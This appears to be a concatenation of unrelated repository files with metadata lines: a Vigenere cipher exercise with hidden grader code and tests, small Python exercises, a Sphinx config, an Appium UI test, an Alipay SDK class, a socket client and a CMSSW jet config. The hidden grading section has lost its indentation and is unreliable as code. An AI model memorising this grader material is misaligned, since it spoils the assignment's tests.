    """Vigenere cipher over the uppercase alphabet A-Z."""
    def __init__(self, key):
        if not key:
            raise ValueError("key must be a non-empty string")
        self.key = key
    def _shift(self, w, sign):
        """Shift each letter of w by the matching key letter (sign is +1 or -1)."""
        return "".join(chr((ord(c) - 65 + sign * (ord(self.key[i % len(self.key)]) - 65)) % 26 + 65)
                       for i, c in enumerate(w))
    def encrypt(self, w):
        """Encrypt an uppercase string w with the Vigenere key."""
        return self._shift(w, +1)
    def decrypt(self, w):
        """Decrypt an uppercase string w with the Vigenere key."""
        return self._shift(w, -1)
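# Quick sanity check (illustration, not part of the graded solution):
# with key "B" every letter shifts forward by one position.
#   v = Vigenere("B")
#   v.encrypt("ABC")  # -> "BCD"
#   v.decrypt("BCD")  # -> "ABC"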
######################################################################
## hidden code
def mk_coverage():
covered = set()
target = set(range(6))
count = 0
def coverage(func):
nonlocal covered, target, count
def wrapper(key):
nonlocal covered, count
if key == "A":
covered.add(0)
elif key != "":
covered.add(1)
if len (key) > 1:
covered.add(2)
if key == key[0] * len (key):
covered.add(4)
else:
covered.add(5)
if len (key) > 2:
covered.add (3)
r = func (key)
count += 1
return r
if func == "achieved": return len(covered)
if func == "required": return len(target)
if func == "count" : return count
functools.update_wrapper (wrapper, func)
return wrapper
return coverage
coverage = mk_coverage ()
try:
Vigenere = coverage (Vigenere)
except:
pass
## Solution, part 3 (tests)
######################################################################
## hidden tests
pytest.main (["-v", "--assert=plain", "-p", "no:cacheprovider"])
from inspect import getfullargspec
class TestNames:
def test_Vigenere (self):
assert Vigenere
def test_encrypt(self):
assert Vigenere.encrypt
assert 'w' in getfullargspec(Vigenere.encrypt).args
def test_decrypt(self):
assert Vigenere.decrypt
assert 'w' in getfullargspec(Vigenere.decrypt).args
class TestGrades:
def test_coverage(self):
assert coverage("achieved") == coverage("required")
def test_Vigenere_is_a_class(self):
assert "class" in repr (Vigenere.__wrapped__)
def test_docstring_present(self):
assert Vigenere.__doc__ is not None
assert Vigenere.encrypt.__doc__ is not None
assert Vigenere.decrypt.__doc__ is not None
def test_empty_key (self):
with pytest.raises (Exception):
assert Vigenere ("")
def test_has_key(self):
k = "asfdg"
v = Vigenere(k)
assert v.key == k
def test_has_methods(self):
v = Vigenere("")
assert v.encrypt
assert v.decrypt
def test_identity(self):
charset = string.ascii_uppercase
v = Vigenere ("A")
for i in range (100):
s = ''.join(random.choice (charset) for j in range (100))
assert v.encrypt(s) == s
assert v.decrypt(s) == s
def test_inverses(self):
charset = string.ascii_uppercase
for i in range (100):
k = ''.join(random.choice (charset) for j in range (random.randrange (1,20)))
v = Vigenere (k)
for n in range (10):
s = ''.join(random.choice (charset) for j in range (100))
assert v.decrypt(v.encrypt(s)) == s
def test_shift (self):
charset = string.ascii_uppercase
for i in range (100):
k = random.choice (charset)
ok = ord (k) - ord ('A')
v = Vigenere (k * random.randrange (1, 100))
s = ''.join(random.choice (charset) for j in range (100))
se = v.encrypt (s)
assert len (se) == len (s)
for x, xe in zip (s, se):
d = (26 + ord (xe) - ord (x)) % 26
assert d == ok
sd = v.decrypt (s)
assert len (sd) == len (s)
for x, xd in zip (s, sd):
d = (26 + ord (x) - ord (xd)) % 26
assert d == ok
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
232499e5789d32aef85d5d3d8bef8407bdaa9cb7
|
ae672becf06e084728388e2ca1fb72ca786336d2
|
/chapter_08/exercise_8_4.py
|
5c3ca3fe1e715841932ad35f802661267a72ad24
|
[] |
no_license
|
kexiaojiu/python_based_programming
|
d9631ba3aa0636d9b01020a7711834ba15d4843c
|
bd497479037856de6ef5852902e3352afb5c7cc9
|
refs/heads/master
| 2018-10-04T22:37:11.908957
| 2018-08-07T13:54:44
| 2018-08-07T13:54:44
| 116,146,067
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
#!/usr/bin/env python3
def make_shirt(size, text='I love Python'):
    print("The size of the shirt is " + str(size) + ", and its text is " +
          text + ".")
make_shirt('big')
make_shirt('middle')
make_shirt('small', 'I love China')
|
[
"kexiaojiu@163.com"
] |
kexiaojiu@163.com
|
7cf38f77e6652d444241e8aa1a1c3c5a15945497
|
1872b89ba17a08db60d58551f073a6b4e0d31a50
|
/instrument_server/commands/command_parser.py
|
ea64dcc7971e724d84b863439d90b5abc4ba6f33
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Terrabits/instrument-server
|
f6e4c40d8e9835ada150dc0a8245024505d0a7d7
|
a4950099410ac81b37516aeefcc6072d9865ba4e
|
refs/heads/master
| 2022-05-28T01:27:25.051729
| 2022-04-29T22:53:39
| 2022-04-29T22:53:39
| 189,175,077
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
from .mixins import RaiseErrorMixin
import re
class CommandParser(RaiseErrorMixin):
def __init__(self, command, args={}):
RaiseErrorMixin.__init__(self)
self.command = command
self.args = args
def is_match(self, command_bytes):
regex = f'^{self.command}\\s*'.replace('?', r'\?').encode()
matches = re.match(regex, command_bytes)
return matches is not None
def parse_args(self, command_bytes):
values = command_bytes.strip().split()[1:]
if len(values) < len(self.args):
self.raise_error('too few arguments')
if len(values) > len(self.args):
self.raise_error('too many arguments')
args = {}
for name, type, value in zip(self.args.keys(), self.args.values(), values):
if type:
try: # type(arg), catch Exception
typed_value = type(value)
except Exception:
self.raise_error(f"'{value}' could not be converted to {type}")
args[name] = typed_value
else:
# decode bytes to str
args[name] = value.decode()
return args
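# Minimal usage sketch (the ':FREQ' command and the argument name 'value' are
# illustrative assumptions, not part of this module):
#
#   parser = CommandParser(':FREQ', args={'value': float})
#   if parser.is_match(b':FREQ 1.5e9\n'):
#       print(parser.parse_args(b':FREQ 1.5e9\n'))  # -> {'value': 1500000000.0}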
|
[
"nick.lalic@gmail.com"
] |
nick.lalic@gmail.com
|
9d06c4edefa4ba7412c5c85dd29d8babd72b8034
|
d3750f32f8bc8a961de778f313a547e8636621e3
|
/docs/conf.py
|
02524b2634ac9ea5185b817381ebece9804fe68f
|
[
"BSD-3-Clause"
] |
permissive
|
diamond0411/ndexncipidloader
|
506e26b9ea8c716fb08dcaf72b138e557ce5b227
|
cf1519bd7e9ada30e00df56011180a9069e4e967
|
refs/heads/master
| 2020-06-13T19:09:19.466283
| 2019-07-16T16:30:23
| 2019-07-16T16:30:23
| 194,761,167
| 1
| 1
|
NOASSERTION
| 2019-07-02T00:40:05
| 2019-07-02T00:40:05
| null |
UTF-8
|
Python
| false
| false
| 4,970
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ndexncipidloader documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import ndexncipidloader
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'NDEx NCI-PID content loader'
copyright = u"2019, Chris Churas"
author = u"Chris Churas"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = ndexncipidloader.__version__
# The full version, including alpha/beta/rc tags.
release = ndexncipidloader.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'ndexncipidloaderdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ndexncipidloader.tex',
u'NDEx NCI-PID content loader Documentation',
u'Chris Churas', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ndexncipidloader',
u'NDEx NCI-PID content loader Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ndexncipidloader',
u'NDEx NCI-PID content loader Documentation',
author,
'ndexncipidloader',
'One line description of project.',
'Miscellaneous'),
]
|
[
"churas.camera@gmail.com"
] |
churas.camera@gmail.com
|
635fd1995cbe947847215eec469862f6d76b83ea
|
bc7199ee3cb7139ac90788cd0469c91d48315797
|
/demo/assignments/unique_chars_2.py
|
0732c380b26e374b09aef426f7cdf5ef0ca1af56
|
[] |
no_license
|
srikanthpragada/python_14_dec_2020
|
617039e15285d84c8503ba49994aec08096d46f9
|
78c046b4aaf9590211dea447c08507969e053e60
|
refs/heads/master
| 2023-02-24T17:41:41.807841
| 2021-02-01T02:17:40
| 2021-02-01T02:17:40
| 322,155,634
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
chars = set()
names = ['Bob', 'Joe', 'John', 'Scott', 'Joseph']
for name in names:
chars |= set(name)
print(chars)
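# Example output (set ordering is arbitrary):
#   {'B', 'o', 'b', 'J', 'e', 'h', 'n', 'S', 'c', 't', 'p', 's'}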
|
[
"srikanthpragada@gmail.com"
] |
srikanthpragada@gmail.com
|
f12bc2202d1d785c55b97d61b4bdb753af43f43f
|
1e84a9fec36deaf9a55a2734749ea035f72ac869
|
/KAKAO BLIND RECRUITMENT/2018/1차/오픈채팅방/다시풀기.py
|
d45e1623d4e94692ba8b281ad8cadaaccec56d79
|
[] |
no_license
|
mgh3326/programmers_algorithm
|
aa3afc91231550e1fec2d72d90e85b140f79d677
|
b62f08ccccbdcac71e484d508985a5a9ce5f2434
|
refs/heads/master
| 2022-08-31T04:19:15.728666
| 2022-07-31T14:02:26
| 2022-07-31T14:02:26
| 201,747,526
| 0
| 0
| null | 2022-07-23T10:19:13
| 2019-08-11T10:02:15
|
Python
|
UTF-8
|
Python
| false
| false
| 965
|
py
|
def solution(record):
answer = []
user_name_dict = {}
saved_list = []
for record_value in record:
split = record_value.split()
if split[0] == "Enter":
user_name_dict[split[1]] = split[2]
saved_list.append([split[1], split[0]])
elif split[0] == "Leave":
saved_list.append([split[1], split[0]])
elif split[0] == "Change":
user_name_dict[split[1]] = split[2]
for saved in saved_list:
out_str = ""
user_id, enter_or_leave = saved
user_name = user_name_dict[user_id]
out_str += user_name
if enter_or_leave == "Enter":
out_str += "님이 들어왔습니다."
else:
out_str += "님이 나갔습니다."
answer.append(out_str)
return answer
print(
solution(
["Enter uid1234 Muzi", "Enter uid4567 Prodo", "Leave uid1234", "Enter uid1234 Prodo", "Change uid4567 Ryan"]
)
)
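# Expected answer for the sample record above:
#   ['Prodo님이 들어왔습니다.', 'Ryan님이 들어왔습니다.',
#    'Prodo님이 나갔습니다.', 'Prodo님이 들어왔습니다.']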
|
[
"mgh3326@naver.com"
] |
mgh3326@naver.com
|
c516ca040b1f31279633585185cb1ab14a83e442
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/alwayson/testcase/firstcases/testcase4_004.py
|
e62d569b14c06d34bfb7f2fe84d450b7f3e68484
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.tomer.alwayson',
'appActivity' : 'com.tomer.alwayson.activities.PreferencesActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.tomer.alwayson/com.tomer.alwayson.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase004
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"com.tomer.alwayson:id/preview\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Support The Development\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.android.browser:id/url\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("https://www.patreon.com/user?u=2966388");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"4_004\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.tomer.alwayson'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage)
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
4985819f4fdae6c3a772431253a034ccb65fd50d
|
e7be538e812d499fd41e483313c486581ac8995c
|
/scripts/curate_cerebra_labels.py
|
2674e048eeed30c7b6f930f5f872efb99271aefc
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
templateflow/tpl-MNI152NLin2009cSym
|
7f11bbd4cdc365c7fc1e6158a6df9c3ee4d52b1e
|
69a5e68d2b276b1e46f701892ac630397f56a741
|
refs/heads/master
| 2022-01-24T16:36:35.462848
| 2022-01-04T19:34:59
| 2022-01-04T19:34:59
| 253,858,504
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
import pandas as pd
data = pd.read_csv('CerebrA_LabelDetails.csv')
right = data.copy()
left = data.copy()
# Add hemisphere column
right['hemi'] = 'R'
left['hemi'] = 'L'
# Reassign headers, drop opposite hemi column
right = right.rename(columns={'Mindboggle ID': 'name', 'Label Name': 'label', 'RH Label': 'drop', 'LH LabelsNotes': 'notes', 'Dice Kappa': 'dice/kappa'})
left = left.rename(columns={'Mindboggle ID': 'name', 'Label Name': 'drop', 'RH Label': 'label', 'LH LabelsNotes': 'notes', 'Dice Kappa': 'dice/kappa'})
right = right.drop(columns=['drop'])
left = left.drop(columns=['drop'])
# Drop index
left.index.name = 'mindboggle mapping'
right.index.name = 'mindboggle mapping'
left = left.reset_index()
right = right.reset_index()
# Merge L/R tables
curated = pd.concat((right, left)).sort_values(by=['mindboggle mapping', 'hemi'])
curated[['label', 'name', 'hemi', 'mindboggle mapping', 'dice/kappa', 'notes']].to_csv('tpl-MNI152NLin2009cSym_atlas-CerebA_dseg.tsv', sep='\t', na_rep='n/a', header=True, index=False)
|
[
"code@oscaresteban.es"
] |
code@oscaresteban.es
|
aada5ffab5800dd2c9361210ed80a88ae3ae8493
|
85e08aa6dcc83ecd33512ba453634b4eb8909638
|
/tools/new-file.py
|
f75d2681fdf30bd02aa32477c92e635046159e55
|
[
"MIT"
] |
permissive
|
full-stack-hero/snippet
|
f6f3f1c6e0a95398a4cfe088821b186512d5940e
|
9600c856c171d1296a151b4d654af0808980f939
|
refs/heads/master
| 2020-04-25T15:39:57.786782
| 2019-03-05T14:19:01
| 2019-03-05T14:19:01
| 172,886,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
import os
import datetime
title = input('Title: ')
filename = datetime.datetime.now().strftime("%Y%m%d%H%M-") + title + '.py'
url = f'https://github.com/full-stack-hero/snippet/blob/master/snippet/snippets/{filename}'
print('Create new file', filename)
with open(f'snippets/{filename}', 'w') as f:
f.write(f'# :autor: @full.stack.hero\n')
f.write(f'# :url: {url}\n\n')
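# Example: entering the title "my_snippet" at 2019-03-05 14:19 creates
# snippets/201903051419-my_snippet.py whose first two lines are the author
# tag and URL comments written above ("my_snippet" is an illustrative title).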
|
[
"axel.juraske@short-report.de"
] |
axel.juraske@short-report.de
|
7baad3a25f85335f80301e2a2cf89fbb9dbe4349
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayEcoCityserviceCityserviceEnergySendModel.py
|
f8a6a8917786fd6a4f675b9c04236c7cbd3cb520
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,425
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.EnergyExtRequest import EnergyExtRequest
class AlipayEcoCityserviceCityserviceEnergySendModel(object):
def __init__(self):
self._ext_info = None
self._outer_no = None
self._scene = None
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
if isinstance(value, list):
self._ext_info = list()
for i in value:
if isinstance(i, EnergyExtRequest):
self._ext_info.append(i)
else:
self._ext_info.append(EnergyExtRequest.from_alipay_dict(i))
@property
def outer_no(self):
return self._outer_no
@outer_no.setter
def outer_no(self, value):
self._outer_no = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
def to_alipay_dict(self):
params = dict()
if self.ext_info:
if isinstance(self.ext_info, list):
for i in range(0, len(self.ext_info)):
element = self.ext_info[i]
if hasattr(element, 'to_alipay_dict'):
self.ext_info[i] = element.to_alipay_dict()
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.outer_no:
if hasattr(self.outer_no, 'to_alipay_dict'):
params['outer_no'] = self.outer_no.to_alipay_dict()
else:
params['outer_no'] = self.outer_no
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayEcoCityserviceCityserviceEnergySendModel()
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'outer_no' in d:
o.outer_no = d['outer_no']
if 'scene' in d:
o.scene = d['scene']
return o
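# Usage sketch, with illustrative values (the ext_info field name below is an
# assumption about EnergyExtRequest, which follows the same SDK pattern):
#
#   model = AlipayEcoCityserviceCityserviceEnergySendModel()
#   model.outer_no = '20190101000001'
#   model.scene = 'ANTFOREST'
#   model.ext_info = [{'key': 'source'}]  # dicts are coerced via from_alipay_dict
#   params = model.to_alipay_dict()       # nested objects serialized recursively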
|
[
"jiandong.jd@antfin.com"
] |
jiandong.jd@antfin.com
|
b2dba4a290d39607a7b51c5620c166530d270fad
|
22b348a0d10519cb1f1da5e886fdf2d3c167cf5a
|
/myweb/test/coroutine_/client.py
|
ce807f0eede3f72de22276beaab46a1d5b077f7d
|
[] |
no_license
|
liuluyang/openstack_mogan_study
|
dab0a8f918ffd17e0a747715998e81304672b75b
|
8624f765da7f5aa0c210f0fa945fc50cf8a67b9e
|
refs/heads/master
| 2021-01-19T17:03:15.370323
| 2018-04-12T09:50:38
| 2018-04-12T09:50:38
| 101,040,396
| 1
| 1
| null | 2017-11-01T02:17:31
| 2017-08-22T08:30:22
|
Python
|
UTF-8
|
Python
| false
| false
| 336
|
py
|
# -*- coding:utf-8 -*-
from socket import *
ADDR, PORT = 'localhost', 8001
client = socket(AF_INET,SOCK_STREAM)
client.connect((ADDR, PORT))
while 1:
cmd = raw_input('>>:').strip()
if len(cmd) == 0: continue
client.send(cmd)
data = client.recv(1024)
print data
#print('Received', repr(data))
#client.close()
|
[
"1120773382@qq.com"
] |
1120773382@qq.com
|
36db3029d152c25aa5180a8d9f6da3065fc2bb81
|
f31fda8014ecadf6af7d4e3392fb917c49e0352a
|
/HeavyIonsAnalysis/JetAnalysis/python/jets/akPuSoftDrop6CaloJetSequence_PbPb_mb_cff.py
|
54a4374e698b2f7c6feb0a96a2d96c43c489dd79
|
[] |
no_license
|
jniedzie/lightbylight
|
acea5051f053c49824a49a0b78bac3a2247ee75f
|
f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8
|
refs/heads/master
| 2020-03-18T12:24:31.970468
| 2018-02-09T15:50:00
| 2018-02-09T15:50:00
| 134,724,759
| 0
| 1
| null | 2018-05-24T14:11:12
| 2018-05-24T14:11:12
| null |
UTF-8
|
Python
| false
| false
| 15,716
|
py
|
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akPuSoftDrop6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPuSoftDrop6CaloJets"),
matched = cms.InputTag("ak6HiCleanedGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.6
)
akPuSoftDrop6CalomatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akSoftDrop6HiGenJets"),
matched = cms.InputTag("ak6HiCleanedGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.6
)
akPuSoftDrop6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akPuSoftDrop6CaloJets")
)
akPuSoftDrop6Calocorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPuSoftDrop6CaloJets"),
payload = "AKPu6Calo_offline"
)
akPuSoftDrop6CaloJetID = cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPuSoftDrop6CaloJets'))
#akPuSoftDrop6Caloclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak6HiCleanedGenJets'))
akPuSoftDrop6CalobTagger = bTaggers("akPuSoftDrop6Calo",0.6)
#create objects locally since they dont load properly otherwise
#akPuSoftDrop6Calomatch = akPuSoftDrop6CalobTagger.match
akPuSoftDrop6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akPuSoftDrop6CaloJets"), matched = cms.InputTag("selectedPartons"))
akPuSoftDrop6CaloPatJetFlavourAssociationLegacy = akPuSoftDrop6CalobTagger.PatJetFlavourAssociationLegacy
akPuSoftDrop6CaloPatJetPartons = akPuSoftDrop6CalobTagger.PatJetPartons
akPuSoftDrop6CaloJetTracksAssociatorAtVertex = akPuSoftDrop6CalobTagger.JetTracksAssociatorAtVertex
akPuSoftDrop6CaloJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloJetBProbabilityBJetTags = akPuSoftDrop6CalobTagger.JetBProbabilityBJetTags
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByPtBJetTags
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByIP3dBJetTags
akPuSoftDrop6CaloTrackCountingHighEffBJetTags = akPuSoftDrop6CalobTagger.TrackCountingHighEffBJetTags
akPuSoftDrop6CaloTrackCountingHighPurBJetTags = akPuSoftDrop6CalobTagger.TrackCountingHighPurBJetTags
akPuSoftDrop6CaloPatJetPartonAssociationLegacy = akPuSoftDrop6CalobTagger.PatJetPartonAssociationLegacy
akPuSoftDrop6CaloImpactParameterTagInfos = akPuSoftDrop6CalobTagger.ImpactParameterTagInfos
akPuSoftDrop6CaloImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuSoftDrop6CaloJetProbabilityBJetTags = akPuSoftDrop6CalobTagger.JetProbabilityBJetTags
akPuSoftDrop6CaloSecondaryVertexTagInfos = akPuSoftDrop6CalobTagger.SecondaryVertexTagInfos
akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloSecondaryVertexNegativeTagInfos = akPuSoftDrop6CalobTagger.SecondaryVertexNegativeTagInfos
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.NegativeCombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.PositiveCombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloSoftPFMuonsTagInfos = akPuSoftDrop6CalobTagger.SoftPFMuonsTagInfos
akPuSoftDrop6CaloSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
